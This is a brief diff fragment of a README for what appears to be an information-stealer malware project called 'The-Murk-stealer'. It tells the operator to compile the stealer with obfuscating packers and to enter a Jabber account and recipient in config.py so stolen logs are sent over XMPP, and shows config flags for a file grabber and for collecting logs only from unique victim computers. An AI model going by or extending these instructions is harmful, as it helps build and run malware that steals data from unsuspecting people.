Choomai/The-Murk-stealer/README.md

 and run `CompileNuitka.bat` or `CompilePyarmor.bat` or `CompilePyinstaller.bat`

 ### 📡For XMPP
-Finally, insert the name and webhook link in the `config\config.py` here
+Insert your jabber id, password and recipient  link in the `config\config.py` here
 ```
 enableFileGrabber = False #enable file grabber
 oneStart = False #enable this if you want logs to come only from unique computers